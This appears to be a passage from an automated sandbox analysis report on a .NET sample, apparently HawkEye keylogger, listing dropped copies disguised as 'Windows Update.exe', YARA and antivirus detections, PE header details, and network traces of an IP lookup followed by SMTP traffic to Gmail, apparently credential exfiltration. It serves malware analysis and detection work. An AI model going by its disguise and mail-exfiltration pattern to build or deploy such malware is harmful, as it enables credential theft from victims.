                                                                                Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                C:\Users\user\AppData\Local\Temp\WERA42C.tmp.WERInternalMetadata.xml
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):2626
                                                                                Entropy (8bit):3.657382504384408
                                                                                Encrypted:false
                                                                                SSDEEP:48:yeRipPp6uhzrkG/wU6Gww7VxpAFgYkbkiQG5zepMVOfyi+Sqw+PjsMS+MbPx2xSQ:Shz4tU6o7VxBt33tJ3uE3
                                                                                MD5:BB7B91CA690F827AF3B229CB8B174191
                                                                                SHA1:6749797C84D4B0B279BD6C887B07CB16ECD9D156
                                                                                SHA-256:A7DD4AC1387116D03AC3C70E3074DCAB3E3B8EB864E2304195F86F1B81923575
                                                                                SHA-512:ADA582C7A441E85028A09DB2DD2C092D0AD67A0CC69BAE00BAD0ED3A2188DC88A1CCBAC6822AE9BA558CE2B7DAEA7C4666AF907EA2BF2AB7AD0A2B55E1820176
                                                                                Malicious:false
                                                                                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.6...1.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.7.6.0.1. .S.e.r.v.i.c.e. .P.a.c.k. .1.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .7. .P.r.o.f.e.s.s.i.o.n.a.l.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.7.6.0.1...2.3.6.7.7...a.m.d.6.4.f.r.e...w.i.n.7.s.p.1._.l.d.r...1.7.0.2.0.9.-.0.6.0.0.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.3.0.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.b.l.e.m.S.i.g.n.a.t.u.
                                                                                C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                Process:C:\Users\user\Desktop\Sample_B.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):533504
                                                                                Entropy (8bit):6.5061470317531676
                                                                                Encrypted:false
                                                                                SSDEEP:6144:1ulqe1RKbS/QTjhUqBfxrwEnuNcSsm7IoYGW0VvBXCAt6kihwE+VDpJYWmlwnx9e:MRKQtqB5urTIoYWBQk1E+VF9mOx9Oi
                                                                                MD5:78300BD48D50FA7E5F3F6A933CC5F739
                                                                                SHA1:03157F27B0D5141465ADEEAF9B3A7B5F3E60F614
                                                                                SHA-256:424212E76C0E660538EE49126079980B34F4DD343E002004F67EA71A937AF5E3
                                                                                SHA-512:18B015CA0B4DE297195E97BA95872C1485FE55A1D89B7FBDD82769A912E0FBB3825975105E5712356FFED525516D7EF3F482F46CE873E9B4315956F2E2A491E7
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Arnim Rupp
                                                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: JPCERT/CC Incident Response Group
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.....................4........... ........@.. ....................................@.....................................W.... ...2...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....2... ...2..................@..@.reloc.......`......."..............@..B........................H.......0}..d..............X...........................................2s..........*....0...........~......(......~....o....~....o..........9.......~....o.........+G~.....o......o........,)...........,.~.....~.....o....o.......................1.~.....~....o......o.....~....~....o....o......~.....(....s....o..........(.........*...................0.. .........(....(..........(.....o......*....................(......(.......o.......o.......o.......o......*.R..(....o....o......
                                                                                C:\Users\user\AppData\Roaming\Windows Update.exe:Zone.Identifier
                                                                                Process:C:\Users\user\Desktop\Sample_B.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:modified
                                                                                Size (bytes):26
                                                                                Entropy (8bit):3.95006375643621
                                                                                Encrypted:false
                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                Malicious:true
                                                                                Preview: [ZoneTransfer]....ZoneId=0
                                                                                C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                                                Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):533504
                                                                                Entropy (8bit):6.5061470317531676
                                                                                Encrypted:false
                                                                                SSDEEP:6144:1ulqe1RKbS/QTjhUqBfxrwEnuNcSsm7IoYGW0VvBXCAt6kihwE+VDpJYWmlwnx9e:MRKQtqB5urTIoYWBQk1E+VF9mOx9Oi
                                                                                MD5:78300BD48D50FA7E5F3F6A933CC5F739
                                                                                SHA1:03157F27B0D5141465ADEEAF9B3A7B5F3E60F614
                                                                                SHA-256:424212E76C0E660538EE49126079980B34F4DD343E002004F67EA71A937AF5E3
                                                                                SHA-512:18B015CA0B4DE297195E97BA95872C1485FE55A1D89B7FBDD82769A912E0FBB3825975105E5712356FFED525516D7EF3F482F46CE873E9B4315956F2E2A491E7
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Arnim Rupp
                                                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Joe Security
                                                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: JPCERT/CC Incident Response Group
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                C:\Users\user\AppData\Roaming\WindowsUpdate.exe:Zone.Identifier
                                                                                Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:modified
                                                                                Size (bytes):26
                                                                                Entropy (8bit):3.95006375643621
                                                                                Encrypted:false
                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                Malicious:true
                                                                                Preview: [ZoneTransfer]....ZoneId=0
                                                                                C:\Users\user\AppData\Roaming\pid.txt
                                                                                Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):4
                                                                                Entropy (8bit):2.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:8:8
                                                                                MD5:4EBD440D99504722D80DE606EA8507DA
                                                                                SHA1:53127AFA9428C4B39465D8FAFFEA4891967FDD3D
                                                                                SHA-256:BA977EDD7884F62CD595D30DC746605253AC8E5700B135AD515AAC7ADAFA512C
                                                                                SHA-512:8F474385AB39E7D6E2A314C91E0452F23BFE19F4E79739D8DAA8E6B1187AB289562EBA6795834CA4744C6EF000CEBA41D0448DADFA233AE332BA89EF03E2B9E3
                                                                                Malicious:false
                                                                                Preview: 2360
                                                                                C:\Users\user\AppData\Roaming\pidloc.txt
                                                                                Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):49
                                                                                Entropy (8bit):4.505229681327448
                                                                                Encrypted:false
                                                                                SSDEEP:3:oNXp4EaKC59KYr4a:oNPaZ534a
                                                                                MD5:08300E5B4297843953DCBA97B84FC23F
                                                                                SHA1:0B3D9411DED86F59DAF4BD11A563357DE2BDFB1E
                                                                                SHA-256:6903CCA5237DD33175367A846A971979FF15CC5823135182E00A57F69A856C9A
                                                                                SHA-512:8C9124CC2258559A2377EB95EC9EB400EE568A133F946FDF7F69BB42A081DA90DFC7F2C544FBDD01AF6A4C235CAF654A0044ACE00835F91FCCDDDAF5F7F579E9
                                                                                Malicious:false
                                                                                Preview: C:\Users\user\AppData\Roaming\Windows Update.exe

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):6.5061470317531676
                                                                                TrID:
                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.69%
                                                                                • Win32 Executable (generic) a (10002005/4) 49.65%
                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                • InstallShield setup (43055/19) 0.21%
                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                File name:Sample_B.exe
                                                                                File size:533504
                                                                                MD5:78300bd48d50fa7e5f3f6a933cc5f739
                                                                                SHA1:03157f27b0d5141465adeeaf9b3a7b5f3e60f614
                                                                                SHA256:424212e76c0e660538ee49126079980b34f4dd343e002004f67ea71a937af5e3
                                                                                SHA512:18b015ca0b4de297195e97ba95872c1485fe55a1d89b7fbdd82769a912e0fbb3825975105e5712356ffed525516d7ef3f482f46ce873e9b4315956f2e2a491e7
                                                                                SSDEEP:6144:1ulqe1RKbS/QTjhUqBfxrwEnuNcSsm7IoYGW0VvBXCAt6kihwE+VDpJYWmlwnx9e:MRKQtqB5urTIoYWBQk1E+VF9mOx9Oi
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.....................4........... ........@.. ....................................@................................

                                                                                File Icon

                                                                                Icon Hash:41455554545445a2

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x480dee
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                Time Stamp:0x6016C109 [Sun Jan 31 14:39:05 2021 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:v2.0.50727
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
                                                                                 add byte ptr [eax], al   (repeated 97 times: the disassembler is decoding the zero padding that follows the stub, not real code)
                                                                                 The single jmp above is the standard CLR loader stub: an indirect jump through the IAT at RVA 0x2000 (listed under Data Directories) to mscoree.dll!_CorExeMain (listed under Imports). The native entrypoint therefore carries no logic of its own; the behaviour of interest lives in the managed code.

                                                                                Data Directories

                                                                                 Name                                   Virtual Address  Virtual Size  Is in Section
                                                                                 IMAGE_DIRECTORY_ENTRY_EXPORT           0x0              0x0
                                                                                 IMAGE_DIRECTORY_ENTRY_IMPORT           0x80d94          0x57          .text
                                                                                 IMAGE_DIRECTORY_ENTRY_RESOURCE         0x82000          0x3200        .rsrc
                                                                                 IMAGE_DIRECTORY_ENTRY_EXCEPTION        0x0              0x0
                                                                                 IMAGE_DIRECTORY_ENTRY_SECURITY         0x0              0x0
                                                                                 IMAGE_DIRECTORY_ENTRY_BASERELOC        0x86000          0xc           .reloc
                                                                                 IMAGE_DIRECTORY_ENTRY_DEBUG            0x0              0x0
                                                                                 IMAGE_DIRECTORY_ENTRY_COPYRIGHT        0x0              0x0
                                                                                 IMAGE_DIRECTORY_ENTRY_GLOBALPTR        0x0              0x0
                                                                                 IMAGE_DIRECTORY_ENTRY_TLS              0x0              0x0
                                                                                 IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG      0x0              0x0
                                                                                 IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT     0x0              0x0
                                                                                 IMAGE_DIRECTORY_ENTRY_IAT              0x2000           0x8           .text
                                                                                 IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT     0x0              0x0
                                                                                 IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR   0x2008           0x48          .text
                                                                                 IMAGE_DIRECTORY_ENTRY_RESERVED         0x0              0x0

                                                                                Sections

                                                                                 Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy          Characteristics
                                                                                 .text   0x2000           0x7edf4       0x7ee00   False     0.572546567118   data       6.53992282183    IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                 .rsrc   0x82000          0x3200        0x3200    False     0.105390625      data       3.5876692887     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                 .reloc  0x86000          0xc           0x200     False     0.044921875      data       0.0815394123432  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                 Name           RVA      Size    Type                                                                                                                  Language  Country
                                                                                 RT_ICON        0x824f0  0x2e8   dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 2004318071, next used block 4286019447
                                                                                 RT_ICON        0x827d8  0x128   GLS_BINARY_LSB_FIRST
                                                                                 RT_ICON        0x82900  0x8a8   dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
                                                                                 RT_ICON        0x831a8  0x568   GLS_BINARY_LSB_FIRST
                                                                                 RT_ICON        0x83710  0x353   PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                 RT_ICON        0x83a68  0x10a8  data
                                                                                 RT_ICON        0x84b10  0x468   GLS_BINARY_LSB_FIRST
                                                                                 RT_GROUP_ICON  0x84f78  0x68    data
                                                                                 RT_VERSION     0x82250  0x2a0   data
                                                                                 RT_MANIFEST    0x84fe0  0x1ea   XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                Imports

                                                                                 DLL          Import
                                                                                 mscoree.dll  _CorExeMain

                                                                                Version Infos

                                                                                 Description       Data
                                                                                 Translation       0x0000 0x04b0
                                                                                 LegalCopyright    Copyright 2014
                                                                                 Assembly Version  1.0.0.0
                                                                                 InternalName      Phulli.exe
                                                                                 FileVersion       1.0.0.0
                                                                                 ProductName       Phulli
                                                                                 ProductVersion    1.0.0.0
                                                                                 FileDescription   Phulli
                                                                                 OriginalFilename  Phulli.exe

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/17/21-14:15:57.240377 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 104.16.155.36 | 192.168.2.22

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 17, 2021 14:15:57.146359921 CET | 49167 | 80 | 192.168.2.22 | 104.16.155.36
Feb 17, 2021 14:15:57.187491894 CET | 80 | 49167 | 104.16.155.36 | 192.168.2.22
Feb 17, 2021 14:15:57.187669992 CET | 49167 | 80 | 192.168.2.22 | 104.16.155.36
Feb 17, 2021 14:15:57.188503981 CET | 49167 | 80 | 192.168.2.22 | 104.16.155.36
Feb 17, 2021 14:15:57.229413033 CET | 80 | 49167 | 104.16.155.36 | 192.168.2.22
Feb 17, 2021 14:15:57.240376949 CET | 80 | 49167 | 104.16.155.36 | 192.168.2.22
Feb 17, 2021 14:15:57.445694923 CET | 49167 | 80 | 192.168.2.22 | 104.16.155.36
Feb 17, 2021 14:15:58.263657093 CET | 49167 | 80 | 192.168.2.22 | 104.16.155.36
Feb 17, 2021 14:15:58.304943085 CET | 80 | 49167 | 104.16.155.36 | 192.168.2.22
Feb 17, 2021 14:15:58.305743933 CET | 49167 | 80 | 192.168.2.22 | 104.16.155.36
Feb 17, 2021 14:15:58.591355085 CET | 49168 | 587 | 192.168.2.22 | 66.102.1.108
Feb 17, 2021 14:15:58.643999100 CET | 587 | 49168 | 66.102.1.108 | 192.168.2.22
Feb 17, 2021 14:15:58.644090891 CET | 49168 | 587 | 192.168.2.22 | 66.102.1.108
Feb 17, 2021 14:15:58.753774881 CET | 587 | 49168 | 66.102.1.108 | 192.168.2.22
Feb 17, 2021 14:15:58.768049955 CET | 49168 | 587 | 192.168.2.22 | 66.102.1.108
Feb 17, 2021 14:15:58.820581913 CET | 587 | 49168 | 66.102.1.108 | 192.168.2.22
Feb 17, 2021 14:15:58.823973894 CET | 587 | 49168 | 66.102.1.108 | 192.168.2.22
Feb 17, 2021 14:15:58.825731993 CET | 49168 | 587 | 192.168.2.22 | 66.102.1.108
Feb 17, 2021 14:15:58.878711939 CET | 587 | 49168 | 66.102.1.108 | 192.168.2.22
Feb 17, 2021 14:15:58.978893995 CET | 49168 | 587 | 192.168.2.22 | 66.102.1.108
Feb 17, 2021 14:15:59.032215118 CET | 587 | 49168 | 66.102.1.108 | 192.168.2.22
Feb 17, 2021 14:15:59.032260895 CET | 587 | 49168 | 66.102.1.108 | 192.168.2.22
Feb 17, 2021 14:15:59.032417059 CET | 49168 | 587 | 192.168.2.22 | 66.102.1.108
Feb 17, 2021 14:15:59.050864935 CET | 49168 | 587 | 192.168.2.22 | 66.102.1.108
Feb 17, 2021 14:15:59.103605032 CET | 587 | 49168 | 66.102.1.108 | 192.168.2.22
Feb 17, 2021 14:15:59.300400972 CET | 49168 | 587 | 192.168.2.22 | 66.102.1.108
Feb 17, 2021 14:15:59.548762083 CET | 49168 | 587 | 192.168.2.22 | 66.102.1.108
Feb 17, 2021 14:15:59.601639032 CET | 587 | 49168 | 66.102.1.108 | 192.168.2.22
Feb 17, 2021 14:15:59.603857994 CET | 49168 | 587 | 192.168.2.22 | 66.102.1.108
Feb 17, 2021 14:15:59.656851053 CET | 587 | 49168 | 66.102.1.108 | 192.168.2.22
Feb 17, 2021 14:15:59.658803940 CET | 49168 | 587 | 192.168.2.22 | 66.102.1.108
Feb 17, 2021 14:15:59.716787100 CET | 587 | 49168 | 66.102.1.108 | 192.168.2.22
Feb 17, 2021 14:15:59.991312027 CET | 587 | 49168 | 66.102.1.108 | 192.168.2.22
Feb 17, 2021 14:15:59.991817951 CET | 49168 | 587 | 192.168.2.22 | 66.102.1.108
Feb 17, 2021 14:16:00.044337034 CET | 587 | 49168 | 66.102.1.108 | 192.168.2.22
Feb 17, 2021 14:16:00.044538975 CET | 587 | 49168 | 66.102.1.108 | 192.168.2.22
Feb 17, 2021 14:16:00.044905901 CET | 49168 | 587 | 192.168.2.22 | 66.102.1.108
Feb 17, 2021 14:16:00.097799063 CET | 587 | 49168 | 66.102.1.108 | 192.168.2.22
Feb 17, 2021 14:16:00.099353075 CET | 49168 | 587 | 192.168.2.22 | 66.102.1.108
Feb 17, 2021 14:16:00.157800913 CET | 587 | 49168 | 66.102.1.108 | 192.168.2.22
Feb 17, 2021 14:16:00.401359081 CET | 587 | 49168 | 66.102.1.108 | 192.168.2.22
Feb 17, 2021 14:16:00.404243946 CET | 49168 | 587 | 192.168.2.22 | 66.102.1.108
Feb 17, 2021 14:16:00.404728889 CET | 49168 | 587 | 192.168.2.22 | 66.102.1.108
Feb 17, 2021 14:16:00.405162096 CET | 49168 | 587 | 192.168.2.22 | 66.102.1.108
Feb 17, 2021 14:16:00.405478001 CET | 49168 | 587 | 192.168.2.22 | 66.102.1.108
Feb 17, 2021 14:16:00.457525969 CET | 587 | 49168 | 66.102.1.108 | 192.168.2.22
Feb 17, 2021 14:16:00.457547903 CET | 587 | 49168 | 66.102.1.108 | 192.168.2.22
Feb 17, 2021 14:16:00.457556963 CET | 587 | 49168 | 66.102.1.108 | 192.168.2.22
Feb 17, 2021 14:16:00.457802057 CET | 587 | 49168 | 66.102.1.108 | 192.168.2.22
Feb 17, 2021 14:16:00.896564007 CET | 587 | 49168 | 66.102.1.108 | 192.168.2.22
Feb 17, 2021 14:16:01.110186100 CET | 49168 | 587 | 192.168.2.22 | 66.102.1.108
Feb 17, 2021 14:16:17.157942057 CET | 49168 | 587 | 192.168.2.22 | 66.102.1.108

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 17, 2021 14:15:56.602780104 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Feb 17, 2021 14:15:56.659929991 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Feb 17, 2021 14:15:57.036444902 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Feb 17, 2021 14:15:57.088181019 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Feb 17, 2021 14:15:58.301774025 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Feb 17, 2021 14:15:58.366976023 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Feb 17, 2021 14:15:58.371413946 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Feb 17, 2021 14:15:58.437342882 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Feb 17, 2021 14:15:58.455055952 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Feb 17, 2021 14:15:58.511831045 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Feb 17, 2021 14:15:58.518007994 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Feb 17, 2021 14:15:58.580215931 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Feb 17, 2021 14:16:00.139292002 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Feb 17, 2021 14:16:00.199146986 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Feb 17, 2021 14:16:00.212182999 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Feb 17, 2021 14:16:00.263868093 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Feb 17, 2021 14:16:01.086823940 CET | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Feb 17, 2021 14:16:01.135674953 CET | 53 | 55627 | 8.8.8.8 | 192.168.2.22
Feb 17, 2021 14:16:01.143835068 CET | 56009 | 53 | 192.168.2.22 | 8.8.8.8
Feb 17, 2021 14:16:01.195561886 CET | 53 | 56009 | 8.8.8.8 | 192.168.2.22
Feb 17, 2021 14:16:01.475300074 CET | 61865 | 53 | 192.168.2.22 | 8.8.8.8
Feb 17, 2021 14:16:01.542368889 CET | 53 | 61865 | 8.8.8.8 | 192.168.2.22
Feb 17, 2021 14:16:01.552608967 CET | 55171 | 53 | 192.168.2.22 | 8.8.8.8
Feb 17, 2021 14:16:01.611363888 CET | 53 | 55171 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 17, 2021 14:15:56.602780104 CET | 192.168.2.22 | 8.8.8.8 | 0x26ae | Standard query (0) | 163.190.5.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 17, 2021 14:15:57.036444902 CET | 192.168.2.22 | 8.8.8.8 | 0x80ac | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
Feb 17, 2021 14:15:58.301774025 CET | 192.168.2.22 | 8.8.8.8 | 0xdcd3 | Standard query (0) | smtp.gmail.com | A (IP address) | IN (0x0001)
Feb 17, 2021 14:15:58.371413946 CET | 192.168.2.22 | 8.8.8.8 | 0xdcd3 | Standard query (0) | smtp.gmail.com | A (IP address) | IN (0x0001)
Feb 17, 2021 14:15:58.455055952 CET | 192.168.2.22 | 8.8.8.8 | 0xdcd3 | Standard query (0) | smtp.gmail.com | A (IP address) | IN (0x0001)
Feb 17, 2021 14:15:58.518007994 CET | 192.168.2.22 | 8.8.8.8 | 0xdcd3 | Standard query (0) | smtp.gmail.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 17, 2021 14:15:56.659929991 CET | 8.8.8.8 | 192.168.2.22 | 0x26ae | Name error (3) | 163.190.5.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Feb 17, 2021 14:15:57.088181019 CET | 8.8.8.8 | 192.168.2.22 | 0x80ac | No error (0) | whatismyipaddress.com | | 104.16.155.36 | A (IP address) | IN (0x0001)
Feb 17, 2021 14:15:57.088181019 CET | 8.8.8.8 | 192.168.2.22 | 0x80ac | No error (0) | whatismyipaddress.com | | 104.16.154.36 | A (IP address) | IN (0x0001)
Feb 17, 2021 14:15:58.366976023 CET | 8.8.8.8 | 192.168.2.22 | 0xdcd3 | No error (0) | smtp.gmail.com | | 66.102.1.108 | A (IP address) | IN (0x0001)
Feb 17, 2021 14:15:58.437342882 CET | 8.8.8.8 | 192.168.2.22 | 0xdcd3 | No error (0) | smtp.gmail.com | | 66.102.1.108 | A (IP address) | IN (0x0001)
Feb 17, 2021 14:15:58.511831045 CET | 8.8.8.8 | 192.168.2.22 | 0xdcd3 | No error (0) | smtp.gmail.com | | 66.102.1.108 | A (IP address) | IN (0x0001)
Feb 17, 2021 14:15:58.580215931 CET | 8.8.8.8 | 192.168.2.22 | 0xdcd3 | No error (0) | smtp.gmail.com | | 66.102.1.108 | A (IP address) | IN (0x0001)
Feb 17, 2021 14:16:01.135674953 CET | 8.8.8.8 | 192.168.2.22 | 0x92f1 | No error (0) | cdn.digicertcdn.com | | 104.18.10.39 | A (IP address) | IN (0x0001)
